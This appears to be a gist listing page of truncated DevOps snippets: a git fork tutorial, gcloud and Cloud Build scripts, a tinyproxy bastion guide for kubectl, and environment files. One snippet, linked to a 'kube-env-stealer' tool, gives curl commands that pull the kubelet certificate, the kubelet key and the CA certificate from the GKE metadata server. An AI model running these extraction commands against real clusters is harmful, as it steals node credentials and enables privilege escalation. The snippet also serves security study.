pydevops

Whether you're trying to give back to the open source community or collaborating on your own projects, knowing how to properly fork and generate pull requests is essential. Unfortunately, it's quite easy to make mistakes or not know what you should do when you're initially learning the process. I know that I certainly had considerable initial trouble with it, and I found a lot of the information on GitHub and around the internet to be rather piecemeal and incomplete - part of the process described here, another there, common hangups in a different place, and so on.

In an attempt to coallate this information for myself and others, this short tutorial is what I've found to be fairly standard procedure for creating a fork, doing your work, issuing a pull request, and merging that pull request back into the original project.

Creating a Fork

Just head over to the GitHub page and click the "Fork" button. It's just that simple. Once you've done that, you can use your favorite git client to clone your repo or j

pydevops

#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail

# For one project only
# Please make sure to run `gcloud config set project <project_id> first`

command -v gcloud >/dev/null 2>&1 || \
  { echo >&2 "I require gcloud but it's not installed. Aborting.";exit 1; }

pydevops

HTTP tunnel

• https://en.wikipedia.org/wiki/HTTP_tunnel

On prem k8s cluster set up with bastion vm

1. Create a bastion vm in your data center or in cloud with connectivity set up (usually vpn) to the on prem data center.
2. Install tinyproxy on the bastion vm and pick a random port as it would be too easy for spam bot with default 8888, set up as systemd service according to https://nxnjz.net/2019/10/how-to-setup-a-simple-proxy-server-with-tinyproxy-debian-10-buster/. Make sure it works by validating with curl --proxy http://127.0.0.1:<tinyproxy-port> https://httpbin.org/ip. And I don't use any user authentication for proxy, so I locked down the firewall rules with my laptop IP/32.
3. Download the kubeconfig file for the k8s cluster to your laptop
4. From your laptop, run

HTTPS_PROXY=<bastion-external-ip>:<tinyproxy-port> KUBECONFIG=my-kubeconfig kubectl get nodes

pydevops

• https://github.com/bgeesaman/kube-env-stealer/blob/master/gke-kubelet-csr-secret-extractor.sh

curl -s -H "Metadata-flavor: Google" http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env

curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt
curl -LO https://storage.googleapis.com/kubernetes-release/release/`curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt`/bin/linux/amd64/kubectl && chmod 755 ./kubectl

KUBERNETES_MASTER_NAME=$(curl -s -H "Metadata-flavor: Google" http://1

pydevops

• https://cloud.google.com/anthos/multicluster-management/connect/registering-a-cluster
• https://cloud.google.com/anthos/multicluster-management/gateway/using
• https://cloud.google.com/service-mesh/docs/gke-install-multi-cluster
• https://gist.github.com/mikesparr/7a34c308c98837a390c8899d1450f2f2#file-anthos-hub-k3s-demo-sh-L137

gcloud services enable connectgateway.googleapis.com
gcloud container hub memberships list
gcloud container hub memberships get-credentials  <your-gke-connect-enabled-cluster-name>

pydevops

steps:
# Build image and push to GCR
- name: 'gcr.io/cloud-builders/docker'
  id: Build
  args:
  - 'build'
  - '-t'
  - 'gcr.io/$PROJECT_ID/$_SERVICE_NAME:v$_PR_NUMBER'
  - '.'
# TODO: look into [images]

pydevops

#!/usr/bin/env bash

export PROJECT_ID=$(gcloud config get-value project)
export PROJECT_USER=$(gcloud config get-value core/account) # set current user
export PROJECT_NUMBER=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")
export IDNS=${PROJECT_ID}.svc.id.goog # workflow identity domain

export GCP_REGION="us-west1"

export ISTIO_VERSION="1.9.1"

pydevops

#!/usr/bin/env bash

export PROJECT_ID=$(gcloud config get-value project)
export PROJECT_USER=$(gcloud config get-value core/account) # set current user
export PROJECT_NUMBER=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")
export IDNS=${PROJECT_ID}.svc.id.goog # workload identity domain

export GCP_REGION="us-central1"
export GCP_ZONE="us-central1-a"

pydevops

#!/usr/bin/env bash

export PROJECT_ID=$(gcloud config get-value project)
export PROJECT_USER=$(gcloud config get-value core/account) # set current user
export PROJECT_NUMBER=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")
export IDNS=${PROJECT_ID}.svc.id.goog # workflow identity domain

export GCP_REGION="us-east1" # CHANGEME (OPT)
export GCP_ZONE="us-east1-c" # CHANGEME (OPT)
export NETWORK_NAME="default"

pydevops

#!/usr/bin/env bash

export PROJECT_ID=$(gcloud config get-value project)
export PROJECT_USER=$(gcloud config get-value core/account) # set current user
export PROJECT_NUMBER=$(gcloud projects describe $PROJECT_ID --format="value(projectNumber)")
export IDNS=${PROJECT_ID}.svc.id.goog # workflow identity domain

export GCP_REGION="us-central1" # CHANGEME (OPT)
export GCP_ZONE="us-central1-a" # CHANGEME (OPT)
export NETWORK_NAME="default"